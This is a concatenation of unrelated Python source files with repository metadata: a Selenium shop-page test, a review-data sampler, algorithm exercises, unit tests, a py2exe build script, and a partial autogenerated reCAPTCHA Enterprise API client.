from framework.base_page import BasePage
from pageobjects.linke_loginpage import LoginPage
from pageobjects.linke_homepage import LinkeHomePage
from pageobjects.ds_shopmanage import ShopManage
import pageobjects
class ShopManageTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
browse = BrowserEngine(cls)
cls.driver = browse.open_browser(cls)
@classmethod
def tearDownClass(cls):
# cls.driver.quit()
pass
def test_ds_menu001(self):
# self.login()
loginpage = LoginPage(self.driver)
loginpage.login()
time.sleep(1)
loginpage.get_windows_img() # 调用基类截图方法
# 点击电商按钮
linkehomepage = LinkeHomePage(self.driver)
time.sleep(1)
linkehomepage.send_ds_link_btn()
time.sleep(1)
shopmanage = ShopManage(self.driver)
print shopmanage.get_y_order_text()
print shopmanage.get_y_amount_text()
print shopmanage.get_no_send_text()
print shopmanage.get_prepare_goods_text()
print shopmanage.get_refund_text()
shopmanage.click_y_order()
time.sleep(1)
self.driver.back()
time.sleep(1)
shopmanage.click_ds_info()
time.sleep(1)
shopmanage.click_ds_info()
# 查询时间
shopmanage.type_select_query_time(u"近一周")
time.sleep(2)
shopmanage.type_select_query_time(u"近一月")
time.sleep(2)
shopmanage.type_select_query_time(u"昨天")
time.sleep(2)
shopmanage.type_select_query_time(u"自定义时间")
time.sleep(2)
shopmanage.type_cus_time("2017-07-20", "2017-07-25")
time.sleep(1)
shopmanage.click_query_btn()
time.sleep(2)
if __name__ == '__main__':
unittest.main()
|
[
"xiongzh@hyxt.com"
] |
xiongzh@hyxt.com
|
66232ac70c2956a0cdd7e2de1e6855bd119e53dc
|
1d7147717ed51c34d09e2f68dbb9c746245b147d
|
/L2C1_project1.py
|
41a63402d6406d1ff1fa10de3b486ec6827f66ba
|
[] |
no_license
|
aaryanredkar/prog4everybody
|
987e60ebabcf223629ce5a80281c984d1a7a7ec2
|
67501b9e9856c771aea5b64c034728644b25dabe
|
refs/heads/master
| 2020-05-29T18:12:33.644086
| 2017-02-13T02:46:44
| 2017-02-13T02:46:44
| 46,829,424
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 90
|
py
|
x = int(input("Please enter an integer:"))
print()
for i in range(0,x + 1):
print (i)
|
[
"aaryantoki@live.com"
] |
aaryantoki@live.com
|
380d17872d9ed8769bac3610758bd177dacef41e
|
49b9c68ab746cb43770fd35771847bd9c18817e6
|
/recsys/experiment/sampler.py
|
f5ab7aa89849497d96e70142acbc65112590a16a
|
[] |
no_license
|
kobauman/signature
|
06a2c579381faa780d79ab3e662c6ec6d28b8555
|
d123ff1557b9d3f81ef7ce7a0a83ea81d614675b
|
refs/heads/master
| 2021-01-21T12:11:42.419877
| 2016-03-25T19:48:08
| 2016-03-25T19:48:08
| 22,729,978
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,290
|
py
|
import logging
import random
import json
import os
'''
Sample TRAIN and TEST
Input: reviews, prob
Output: list of reviews in TEST
'''
def sampler(path, reviews_filename, probs = [0.4, 0.8], busThres = 0, userThres = 0):
logger = logging.getLogger('signature.sampler')
logger.info('starting sampling')
#load reviews
review_file = open(reviews_filename,"r")
bus_info = dict()
user_info = dict()
reviews = list()
for counter, line in enumerate(review_file):
reviews.append(json.loads(line))
busId = reviews[-1]['business_id']
userId = reviews[-1]['user_id']
bus_info[busId] = bus_info.get(busId,0)
bus_info[busId]+=1
user_info[userId] = user_info.get(userId,0)
user_info[userId]+=1
if not counter %10000:
logger.info('%d reviews processed'%counter)
review_file.close()
r_num = len(reviews)
#clean by business
good_bus = set([bus for bus in bus_info if bus_info[bus] > busThres])
reviews = [review for review in reviews if review['business_id'] in good_bus]
good_user = set([user for user in user_info if user_info[user] > userThres])
reviews = [review for review in reviews if review['user_id'] in good_user]
logger.info('Num of businesses before = %d, after = %d'%(len(bus_info),len(good_bus)))
logger.info('Num of users before = %d, after = %d'%(len(user_info),len(good_user)))
logger.info('Num of reviews before = %d, after = %d'%(r_num,len(reviews)))
#shuffle
random.shuffle(reviews)
thres1 = len(reviews)*probs[0]
thres2 = len(reviews)*probs[1]
train_filename = reviews_filename.replace('_features.json','_train.json')
stat_filename = reviews_filename.replace('_features.json','_stat.json')
extrain_filename = reviews_filename.replace('_features.json','_extrain.json')
test_filename = reviews_filename.replace('_features.json','_test.json')
train_file = open(train_filename,"w")
stat_file = open(stat_filename,"w")
extrain_file = open(extrain_filename,"w")
test_file = open(test_filename,"w")
counters = [0,0,0,0]
for counter, review in enumerate(reviews):
review = json.dumps(review)
if counter < thres2:
train_file.write(review+'\n')
counters[0] += 1
if counter < thres1:
stat_file.write(review+'\n')
counters[1] += 1
elif counter < thres2:
extrain_file.write(review+'\n')
counters[2] += 1
else:
test_file.write(review+'\n')
counters[3] += 1
train_file.close()
stat_file.close()
extrain_file.close()
test_file.close()
logger.info('DONE %s'%str(counters))
try:
os.stat(path+'results/')
except:
os.mkdir(path+'results/')
outfile = open(path+'results/Numbers_stat.txt','w')
outfile.write('Businesses only with > %d reviews\nUsers only with > %d reviews'%(busThres,userThres))
outfile.write('\nTrain: %d,\n Stat: %d,\nExtrain: %d,\nTest: %d'%(counters[0],counters[1],counters[2],counters[3]))
outfile.close()
|
[
"kbauman@yandex.ru"
] |
kbauman@yandex.ru
|
3387a7b1ab5c092a4be3f73958c4f37a2aec6a5c
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02683/s728076842.py
|
530d406c4a8a8bf681c980d60d4d26bc44d72770
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 390
|
py
|
import numpy as np
n,m,x=map(int,input().split())
a=2**64
b=[np.array(list(map(int,input().split())),"i8")for i in range(n)]
for i in range(2**n):
c=bin(i)[2:]
c="0"*(n-len(c))+c
l=np.zeros(m)
q=0
for j in range(n):
if c[j]=="1":
q+=b[j][0]
l+=b[j][1:]
if np.min(l)>=x:
a=min(a,q)
if a==2**64:
print(-1)
else:
print(a)
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
7d4360c378c244e4834437c6bf0bbf020e1885ff
|
b85bca40004f9d1737fb4d342e8ea040eefb453b
|
/tests/lgdo/test_scalar.py
|
3ff4c51833af64977b65fb3570d064c5a0fc7ac5
|
[
"Apache-2.0"
] |
permissive
|
wisecg/pygama
|
95f744af56a8df81020f195695128a5ce0a6aca6
|
9a422d73c20e729f8d014a120a7e8714685ce4db
|
refs/heads/main
| 2022-12-24T02:02:05.554163
| 2022-12-05T16:32:30
| 2022-12-05T16:32:30
| 257,975,470
| 0
| 1
|
Apache-2.0
| 2020-04-22T17:41:46
| 2020-04-22T17:41:45
| null |
UTF-8
|
Python
| false
| false
| 468
|
py
|
import pygama.lgdo as lgdo
def test_datatype_name():
scalar = lgdo.Scalar(value=42)
assert scalar.datatype_name() == "real"
def test_form_datatype():
scalar = lgdo.Scalar(value=42)
assert scalar.form_datatype() == "real"
# TODO: check for warning if mismatched datatype
def test_init():
attrs = {"attr1": 1}
scalar = lgdo.Scalar(value=42, attrs=attrs)
assert scalar.value == 42
assert scalar.attrs == attrs | {"datatype": "real"}
|
[
"luigi.pertoldi@protonmail.com"
] |
luigi.pertoldi@protonmail.com
|
1b9d741b46cbdeed5b3a3bac485cf1c895171822
|
1d38c549c07f43cc26b7353ef95300b934eeed33
|
/setup.py
|
9475e9b22ed79c0c28f6d00f6eec5f19bf0269e4
|
[] |
no_license
|
pooyagheyami/Adel3
|
a6354fbc5aa56a9c38a8b724c8d22bea689380a1
|
29e257e19fd6914de0e60c303871321e457a858b
|
refs/heads/master
| 2022-11-07T21:53:13.958369
| 2020-06-12T13:22:55
| 2020-06-12T13:22:55
| 271,803,177
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 9,530
|
py
|
# ======================================================== #
# File automagically generated by GUI2Exe version 0.5.3
# Copyright: (c) 2007-2012 Andrea Gavana
# ======================================================== #
# Let's start with some default (for me) imports...
from distutils.core import setup
from py2exe.build_exe import py2exe
import glob
import os
import zlib
import shutil
# Remove the build folder
shutil.rmtree("build", ignore_errors=True)
class Target(object):
""" A simple class that holds information on our executable file. """
def __init__(self, **kw):
""" Default class constructor. Update as you need. """
self.__dict__.update(kw)
# Ok, let's explain why I am doing that.
# Often, data_files, excludes and dll_excludes (but also resources)
# can be very long list of things, and this will clutter too much
# the setup call at the end of this file. So, I put all the big lists
# here and I wrap them using the textwrap module.
data_files = [('GUI\AuiPanel', ['F:\\Adel2\\GUI\\AuiPanel\\__init__.pyc',
'F:\\Adel2\\GUI\\AuiPanel\\Rev.pyc',
'F:\\Adel2\\GUI\\AuiPanel\\Stat.pyc']),
('GUI\Edit', ['F:\\Adel2\\GUI\\Edit\\__init__.pyc',
'F:\\Adel2\\GUI\\Edit\\accsrh.pyc',
'F:\\Adel2\\GUI\\Edit\\buyit.pyc',
'F:\\Adel2\\GUI\\Edit\\EDA.pyc',
'F:\\Adel2\\GUI\\Edit\\Edacc.pyc',
'F:\\Adel2\\GUI\\Edit\\EDM.pyc',
'F:\\Adel2\\GUI\\Edit\\Edmolk6.pyc',
'F:\\Adel2\\GUI\\Edit\\Edmolk62.pyc',
'F:\\Adel2\\GUI\\Edit\\InAcc3.pyc',
'F:\\Adel2\\GUI\\Edit\\Pnl0.pyc',
'F:\\Adel2\\GUI\\Edit\\Specy.pyc']),
('Database', ['F:\\Adel2\\Database\\__init__.pyc',
'F:\\Adel2\\Database\\ABR.db',
'F:\\Adel2\\Database\\Company.db',
'F:\\Adel2\\Database\\DataGet.pyc',
'F:\\Adel2\\Database\\Main.db',
'F:\\Adel2\\Database\\MDataGet.pyc',
'F:\\Adel2\\Database\\Menu.db',
'F:\\Adel2\\Database\\MenuSet.pyc',
'F:\\Adel2\\Database\\Molk.db',
'F:\\Adel2\\Database\\wxsq2.pyc']),
('GUI', ['F:\\Adel2\\GUI\\__init__.pyc',
'F:\\Adel2\\GUI\\BG.pyc',
'F:\\Adel2\\GUI\\MainMenu.pyc',
'F:\\Adel2\\GUI\\proman.pyc',
'F:\\Adel2\\GUI\\window.pyc']),
('GUI\Input', ['F:\\Adel2\\GUI\\Input\\__init__.pyc',
'F:\\Adel2\\GUI\\Input\\accsrh.pyc',
'F:\\Adel2\\GUI\\Input\\buyit.pyc',
'F:\\Adel2\\GUI\\Input\\IAc.pyc',
'F:\\Adel2\\GUI\\Input\\IMK.pyc',
'F:\\Adel2\\GUI\\Input\\InAcc3.pyc',
'F:\\Adel2\\GUI\\Input\\InM6.pyc',
'F:\\Adel2\\GUI\\Input\\InMolk61.pyc',
'F:\\Adel2\\GUI\\Input\\InMolk62.pyc',
'F:\\Adel2\\GUI\\Input\\Pmenu.pyc',
'F:\\Adel2\\GUI\\Input\\Pnl0.pyc',
'F:\\Adel2\\GUI\\Input\\Specy.pyc']),
('GUI\Program', ['F:\\Adel2\\GUI\\Program\\quit.pyc',
'F:\\Adel2\\GUI\\Program\\DEF.pyc',
'F:\\Adel2\\GUI\\Program\\defin2.pyc',
'F:\\Adel2\\GUI\\Program\\Pnl0.pyc',
'F:\\Adel2\\GUI\\Program\\pro1.pyc',
'F:\\Adel2\\GUI\\Program\\proper.pyc']),
('GUI\Report', ['F:\\Adel2\\GUI\\Report\\__init__.pyc',
'F:\\Adel2\\GUI\\Report\\AD1.pyc',
'F:\\Adel2\\GUI\\Report\\ADftar.pyc',
'F:\\Adel2\\GUI\\Report\\buyit.pyc',
'F:\\Adel2\\GUI\\Report\\MD1.pyc',
'F:\\Adel2\\GUI\\Report\\MD2.pyc',
'F:\\Adel2\\GUI\\Report\\MDftar1.pyc',
'F:\\Adel2\\GUI\\Report\\MDftar4.pyc',
'F:\\Adel2\\GUI\\Report\\Pnl0.pyc',
'F:\\Adel2\\GUI\\Report\\RMolk61.pyc',
'F:\\Adel2\\GUI\\Report\\RMolk62.pyc',
'F:\\Adel2\\GUI\\Report\\Specy.pyc']),
('GUI\Develop', ['F:\\Adel2\\GUI\\Develop\\__init__.pyc',
'F:\\Adel2\\GUI\\Develop\\buyit.pyc',
'F:\\Adel2\\GUI\\Develop\\Pnl0.pyc']),
('GUI\Help', ['F:\\Adel2\\GUI\\Help\\__init__.pyc',
'F:\\Adel2\\GUI\\Help\\about.pyc',
'F:\\Adel2\\GUI\\Help\\Pnl0.pyc']),
('GUI\Connect', ['F:\\Adel2\\GUI\\Connect\\__init__.pyc',
'F:\\Adel2\\GUI\\Connect\\buyit.pyc',
'F:\\Adel2\\GUI\\Connect\\Pnl0.pyc']),
('Config', ['F:\\Adel2\\Config\\__init__.pyc',
'F:\\Adel2\\Config\\config.pyc',
'F:\\Adel2\\Config\\Init.pyc',
'F:\\Adel2\\Config\\program.ini']),
('Utility', ['F:\\Adel2\\Utility\\__init__.pyc',
'F:\\Adel2\\Utility\\Adaad2.pyc',
'F:\\Adel2\\Utility\\adadfa1',
'F:\\Adel2\\Utility\\B1.pyc',
'F:\\Adel2\\Utility\\barcode.png',
'F:\\Adel2\\Utility\\calcu.pyc',
'F:\\Adel2\\Utility\\calculator.bmp',
'F:\\Adel2\\Utility\\calfar01.pyc',
'F:\\Adel2\\Utility\\clacal3.pyc',
'F:\\Adel2\\Utility\\fakey.pyc'])]
includes = ['khayyam', 'wx', 'wx.dataview', 'wx.lib']
excludes = ['_gtkagg', '_tkagg', 'bsddb', 'curses', 'email', 'pywin.debugger',
'pywin.debugger.dbgcon', 'pywin.dialogs', 'tcl',
'Tkconstants', 'Tkinter']
packages = ['Config', 'Database', 'GUI', 'GUI.AuiPanel', 'GUI.Connect',
'GUI.Develop', 'GUI.Edit', 'GUI.Help', 'GUI.Input',
'GUI.Program', 'GUI.Report', 'Utility']
dll_excludes = ['libgdk-win32-2.0-0.dll', 'libgobject-2.0-0.dll', 'tcl84.dll',
'tk84.dll']
icon_resources = [(1, 'F:\\Adel2\\Res\\Icons\\f4.ico'), (2, 'F:\\Adel2\\Res\\Icons\\U5.ico')]
bitmap_resources = [(1, 'F:\\Adel2\\Utility\\calculator.bmp')]
other_resources = [(4, 24, 'F:\\Adel2\\Res\\Pics\\B10.jpg'), (5, 24, 'F:\\Adel2\\Res\\Pics\\B11.jpg'),
(6, 24, 'F:\\Adel2\\Res\\Pics\\B13.jpg'),
(7, 24, 'F:\\Adel2\\Res\\Pics\\B14.jpg'),
(8, 24, 'F:\\Adel2\\Res\\Pics\\B16.jpg'),
(1, 24, 'F:\\Adel2\\Res\\Pics\\B6.jpg'),
(2, 24, 'F:\\Adel2\\Res\\Pics\\B7.jpg'),
(3, 24, 'F:\\Adel2\\Res\\Pics\\B8.jpg')]
# This is a place where the user custom code may go. You can do almost
# whatever you want, even modify the data_files, includes and friends
# here as long as they have the same variable name that the setup call
# below is expecting.
# No custom code added
# Ok, now we are going to build our target class.
# I chose this building strategy as it works perfectly for me :-D
GUI2Exe_Target_1 = Target(
# what to build
script = "mainpro.py",
icon_resources = icon_resources,
bitmap_resources = bitmap_resources,
other_resources = other_resources,
dest_base = "mainpro",
version = "0.1",
company_name = "Chashme",
copyright = "Cheshme",
name = "Py2Exe Sample File",
)
# No custom class for UPX compression or Inno Setup script
# That's serious now: we have all (or almost all) the options py2exe
# supports. I put them all even if some of them are usually defaulted
# and not used. Some of them I didn't even know about.
setup(
# No UPX or Inno Setup
data_files = data_files,
options = {"py2exe": {"compressed": 0,
"optimize": 0,
"includes": includes,
"excludes": excludes,
"packages": packages,
"dll_excludes": dll_excludes,
"bundle_files": 3,
"dist_dir": "dist",
"xref": False,
"skip_archive": False,
"ascii": False,
"custom_boot_script": '',
}
},
zipfile = None,
console = [],
windows = [GUI2Exe_Target_1],
service = [],
com_server = [],
ctypes_com_server = []
)
# This is a place where any post-compile code may go.
# You can add as much code as you want, which can be used, for example,
# to clean up your folders or to do some particular post-compilation
# actions.
# No post-compilation code added
# And we are done. That's a setup script :-D
|
[
"pooyagheyami@gmail.com"
] |
pooyagheyami@gmail.com
|
fcaf5d0a55c1039dcaa09d5b5481a8e32e5b4f85
|
52d77c903a5f00fd55985394cd17ee380aaf3ccf
|
/script/Utils.py
|
bdba0a8a74c2251dc082020e61e7724bc1dae669
|
[] |
no_license
|
alexanderflorean/BSc-JavSoCoClassifier
|
7b60ac5df6860c2ec1d7a47fddfba3f14b105b84
|
a6fe7a6fec06beca9f2940cf9c2cdd08bbdaab1a
|
refs/heads/main
| 2023-04-26T06:09:04.250918
| 2021-06-08T13:04:33
| 2021-06-08T13:04:33
| 349,335,825
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,936
|
py
|
import yaml
# minimum of available 5 test files regardless of training size.
MIN_NUM_OF_TEST_FILES = 5
def remove_label_column_from_dataframe(dataFrame, label):
return dataFrame[dataFrame["Label"].isin(label) == False].reset_index(drop=True)
def remove_concerns_under_quantity_threshold(dataFrame, minNumOfFiles=5):
labels = dataFrame.Label.unique()
x_quantity = [len(dataFrame.loc[dataFrame["Label"] == label]) for label in labels]
to_be_removed_labels = []
for pos in range(len(labels)):
if x_quantity[pos] < minNumOfFiles + MIN_NUM_OF_TEST_FILES:
to_be_removed_labels.append(labels[pos])
return remove_label_column_from_dataframe(dataFrame, to_be_removed_labels)
def read_yaml_file(path_to_yaml: str):
try:
with open(path_to_yaml, "r") as file:
config = yaml.safe_load(file)
return config
except Exception as e:
print(e + ": Error reading the yaml file: " + path_to_yaml)
def make_dataframe_row(metrics, setting: list, feature_rep: str, setting_id: str) -> dict:
report = metrics.get_classification_report()
quantity_table = metrics.quantity_table()
row = {
"classifier": metrics.name,
"setting_id": setting_id,
"Feature rep.": feature_rep,
"settings": setting,
"accuracy": report["accuracy"],
"macro_precision": report["macro avg"]["precision"],
"macro_recall": report["macro avg"]["recall"],
"weighted_precision": report["weighted avg"]["precision"],
"weighted_recall": report["weighted avg"]["recall"],
"macro_f1": report["macro avg"]["f1-score"],
"weighted_f1": report["weighted avg"]["f1-score"],
"train_size": quantity_table["Train"].sum(),
"test_size": quantity_table["Test"].sum(),
"report_table": metrics.total_report_table(),
}
return row
|
[
"florean.alexander@gmail.com"
] |
florean.alexander@gmail.com
|
a037aadb28a082e3c64b0d78e14d175f29d0182b
|
779515ef9cb52d13c8f6c46623ec8906ac658452
|
/utils/emoji.py
|
436a96bd1585e415b52958284aaacfef43cc33c8
|
[
"MIT"
] |
permissive
|
Chrrapek/DiscordMiejski
|
ca014b81f4d41efe7cc9ac28913da9b29afc64e0
|
fd59433c1315baadd91a9ef29ca534924bcdc7f4
|
refs/heads/master
| 2023-04-14T20:59:44.765418
| 2021-04-12T19:18:53
| 2021-04-12T19:18:53
| 303,675,183
| 3
| 2
|
MIT
| 2021-04-12T19:18:54
| 2020-10-13T11:05:09
|
Python
|
UTF-8
|
Python
| false
| false
| 65
|
py
|
PEPE_SAD = 775061981496606740
PEPE_NAWROCKI = 775059704795758602
|
[
"janek@projmen.pl"
] |
janek@projmen.pl
|
e95bf537e32a24dacce0ab8d8e392fff4ac0c249
|
cda2cbe020f70db1bfc645973a9c1e3c62e18e92
|
/ex24.py
|
5248ea0c9a8da0dd9d98ea9ece2a571e9aa3f114
|
[] |
no_license
|
SpaceOtterInSpace/Learn-Python
|
a22c27a8fc4d955a309b8248d7e34b8957eecf24
|
3f8cc6b6212449ef3f2148e66bce9d83f23191dc
|
refs/heads/master
| 2020-04-20T16:29:46.282166
| 2015-07-07T20:04:36
| 2015-07-07T20:04:36
| 35,775,230
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 916
|
py
|
print "Let's practice everything."
print 'You\'d need to know \'bout escapes with \\ that do \n newlines and \t tabs.'
poem = """
\tThe lovely world
with logic so firmly planted
cannot discern \n the needs of love
nor comprehend passion from intuition
and requires an explanation
\n\t\twhere there is none.
"""
print "----------"
print poem
print "----------"
five = 10 - 2 + 3 - 6
print "This should be five: %s" % five
def secret_formula(started):
jelly_beans = started * 500
jars = jelly_beans / 1000
crates = jars / 100
return jelly_beans, jars, crates
start_point = 10000
beans, jars, crates = secret_formula(start_point)
print "With a starting point of: %d" % start_point
print "We'd have %d beans, %d jars, and %d crates." % (beans, jars, crates)
start_point = start_point / 10
print "We can also do that this way:"
print "We'd have %d beans, %d jars, and %d crates." % secret_formula(start_point)
|
[
"jacqui@mudbugmedia.com"
] |
jacqui@mudbugmedia.com
|
602bf5ff185fae424574e01f0d60bafdc9fad426
|
9d032e9864ebda8351e98ee7950c34ce5168b3b6
|
/301.py
|
10f8978082ea2c4ee7bbac60f631a00e920d68cf
|
[] |
no_license
|
snpushpi/P_solving
|
e0daa4809c2a3612ba14d7bff49befa7e0fe252b
|
9980f32878a50c6838613d71a8ee02f492c2ce2c
|
refs/heads/master
| 2022-11-30T15:09:47.890519
| 2020-08-16T02:32:49
| 2020-08-16T02:32:49
| 275,273,765
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,269
|
py
|
'''
Remove the minimum number of invalid parentheses in order to make the input string valid. Return all possible results.
Note: The input string may contain letters other than the parentheses ( and ).
Example 1:
Input: "()())()"
Output: ["()()()", "(())()"]
Example 2:
Input: "(a)())()"
Output: ["(a)()()", "(a())()"]
Example 3:
Input: ")("
Output: [""]
'''
def validstring(string):
count = 0
for char in string:
if char=='(':
count+=1
elif char==')':
count-=1
if count<0:
return False
return (count==0)
def main(input_string):
l = len(input_string)
queue = [input_string]
visited = set()
visited.add(input_string)
level = False
result = []
while queue:
new_str = queue.pop(0)
if validstring(new_str):
result.append(new_str)
level= True
if level:
continue
for i in range(len(new_str)):
if not (new_str[i]==')' or new_str[i]=='('):
continue
part_string = new_str[:i]+new_str[i+1:]
if part_string not in visited:
visited.add(part_string)
queue.append(part_string)
return result
print(main("()())()"))
|
[
"55248448+snpushpi@users.noreply.github.com"
] |
55248448+snpushpi@users.noreply.github.com
|
d9e7c56938990536056e245fd9a4e8f269ca531c
|
a54aaaf50c84b8ffa48a810ff9a25bfe8e28ba96
|
/euler017.py
|
7b50a537c65bdf4546e8de4b9c5b747a69368e15
|
[] |
no_license
|
danielmmetz/euler
|
fd5faefdfd58de04e744316618f43c40e6cbb288
|
fe64782617d6e14b8b2b65c3a039716adb789997
|
refs/heads/master
| 2021-01-17T08:44:26.586954
| 2016-05-12T02:35:10
| 2016-05-12T02:35:10
| 40,574,287
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 885
|
py
|
"""
If the numbers 1 to 5 are written out in words: one, two, three, four, five,
then there are 3 + 3 + 5 + 4 + 4 = 19 letters used in total.
If all the numbers from 1 to 1000 (one thousand) inclusive were written out in
words, how many letters would be used?
NOTE: Do not count spaces or hyphens. For example, 342 (three hundred and forty-
two) contains 23 letters and 115 (one hundred and fifteen) contains 20 letters.
The use of "and" when writing out numbers is in compliance with British usage.
"""
from collections import Counter
from num2words import num2words
from string import ascii_lowercase as letters
def answer(bound):
char_counts = Counter()
for num in xrange(1, bound+1):
char_counts += Counter(char for char in num2words(num, lang='en_GB'))
return sum(char_counts[char] for char in letters)
if __name__ == '__main__':
print answer(1000)
|
[
"danielmmetz@gmail.com"
] |
danielmmetz@gmail.com
|
59fafc2d56a1ca1d9d3712f7dfda2784a96c910b
|
71c331e4b1e00fa3be03b7f711fcb05a793cf2af
|
/QA-System-master/SpeechToText_test/google-cloud-sdk/lib/googlecloudsdk/third_party/apis/recaptchaenterprise/v1/recaptchaenterprise_v1_client.py
|
79510bf7357cd70baba2a7b3f103d23cabd30234
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
iofh/QA-System
|
568228bb0c0adf9ec23b45cd144d61049e720002
|
af4a8f1b5f442ddf4905740ae49ed23d69afb0f6
|
refs/heads/master
| 2022-11-27T23:04:16.385021
| 2020-08-12T10:11:44
| 2020-08-12T10:11:44
| 286,980,492
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,467
|
py
|
"""Generated client library for recaptchaenterprise version v1."""
# NOTE: This file is autogenerated and should not be edited by hand.
from apitools.base.py import base_api
from googlecloudsdk.third_party.apis.recaptchaenterprise.v1 import recaptchaenterprise_v1_messages as messages
class RecaptchaenterpriseV1(base_api.BaseApiClient):
"""Generated client library for service recaptchaenterprise version v1."""
MESSAGES_MODULE = messages
BASE_URL = 'https://recaptchaenterprise.googleapis.com/'
MTLS_BASE_URL = 'https://recaptchaenterprise.mtls.googleapis.com/'
_PACKAGE = 'recaptchaenterprise'
_SCOPES = ['https://www.googleapis.com/auth/cloud-platform']
_VERSION = 'v1'
_CLIENT_ID = '1042881264118.apps.googleusercontent.com'
_CLIENT_SECRET = 'x_Tw5K8nnjoRAqULM9PFAC2b'
_USER_AGENT = 'google-cloud-sdk'
_CLIENT_CLASS_NAME = 'RecaptchaenterpriseV1'
_URL_VERSION = 'v1'
_API_KEY = None
def __init__(self, url='', credentials=None,
get_credentials=True, http=None, model=None,
log_request=False, log_response=False,
credentials_args=None, default_global_params=None,
additional_http_headers=None, response_encoding=None):
"""Create a new recaptchaenterprise handle."""
url = url or self.BASE_URL
super(RecaptchaenterpriseV1, self).__init__(
url, credentials=credentials,
get_credentials=get_credentials, http=http, model=model,
log_request=log_request, log_response=log_response,
credentials_args=credentials_args,
default_global_params=default_global_params,
additional_http_headers=additional_http_headers,
response_encoding=response_encoding)
self.projects_assessments = self.ProjectsAssessmentsService(self)
self.projects_keys = self.ProjectsKeysService(self)
self.projects = self.ProjectsService(self)
class ProjectsAssessmentsService(base_api.BaseApiService):
"""Service class for the projects_assessments resource."""
_NAME = 'projects_assessments'
def __init__(self, client):
super(RecaptchaenterpriseV1.ProjectsAssessmentsService, self).__init__(client)
self._upload_configs = {
}
def Annotate(self, request, global_params=None):
r"""Annotates a previously created Assessment to provide additional information.
on whether the event turned out to be authentic or fradulent.
Args:
request: (RecaptchaenterpriseProjectsAssessmentsAnnotateRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecaptchaenterpriseV1AnnotateAssessmentResponse) The response message.
"""
config = self.GetMethodConfig('Annotate')
return self._RunMethod(
config, request, global_params=global_params)
Annotate.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/assessments/{assessmentsId}:annotate',
http_method='POST',
method_id='recaptchaenterprise.projects.assessments.annotate',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1/{+name}:annotate',
request_field='googleCloudRecaptchaenterpriseV1AnnotateAssessmentRequest',
request_type_name='RecaptchaenterpriseProjectsAssessmentsAnnotateRequest',
response_type_name='GoogleCloudRecaptchaenterpriseV1AnnotateAssessmentResponse',
supports_download=False,
)
def Create(self, request, global_params=None):
r"""Creates an Assessment of the likelihood an event is legitimate.
Args:
request: (RecaptchaenterpriseProjectsAssessmentsCreateRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecaptchaenterpriseV1Assessment) The response message.
"""
config = self.GetMethodConfig('Create')
return self._RunMethod(
config, request, global_params=global_params)
Create.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/assessments',
http_method='POST',
method_id='recaptchaenterprise.projects.assessments.create',
ordered_params=['parent'],
path_params=['parent'],
query_params=[],
relative_path='v1/{+parent}/assessments',
request_field='googleCloudRecaptchaenterpriseV1Assessment',
request_type_name='RecaptchaenterpriseProjectsAssessmentsCreateRequest',
response_type_name='GoogleCloudRecaptchaenterpriseV1Assessment',
supports_download=False,
)
class ProjectsKeysService(base_api.BaseApiService):
"""Service class for the projects_keys resource."""
_NAME = 'projects_keys'
def __init__(self, client):
super(RecaptchaenterpriseV1.ProjectsKeysService, self).__init__(client)
self._upload_configs = {
}
def Create(self, request, global_params=None):
r"""Creates a new reCAPTCHA Enterprise key.
Args:
request: (RecaptchaenterpriseProjectsKeysCreateRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecaptchaenterpriseV1Key) The response message.
"""
config = self.GetMethodConfig('Create')
return self._RunMethod(
config, request, global_params=global_params)
Create.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/keys',
http_method='POST',
method_id='recaptchaenterprise.projects.keys.create',
ordered_params=['parent'],
path_params=['parent'],
query_params=[],
relative_path='v1/{+parent}/keys',
request_field='googleCloudRecaptchaenterpriseV1Key',
request_type_name='RecaptchaenterpriseProjectsKeysCreateRequest',
response_type_name='GoogleCloudRecaptchaenterpriseV1Key',
supports_download=False,
)
def Delete(self, request, global_params=None):
r"""Deletes the specified key.
Args:
request: (RecaptchaenterpriseProjectsKeysDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleProtobufEmpty) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/keys/{keysId}',
http_method='DELETE',
method_id='recaptchaenterprise.projects.keys.delete',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1/{+name}',
request_field='',
request_type_name='RecaptchaenterpriseProjectsKeysDeleteRequest',
response_type_name='GoogleProtobufEmpty',
supports_download=False,
)
def Get(self, request, global_params=None):
r"""Returns the specified key.
Args:
request: (RecaptchaenterpriseProjectsKeysGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecaptchaenterpriseV1Key) The response message.
"""
config = self.GetMethodConfig('Get')
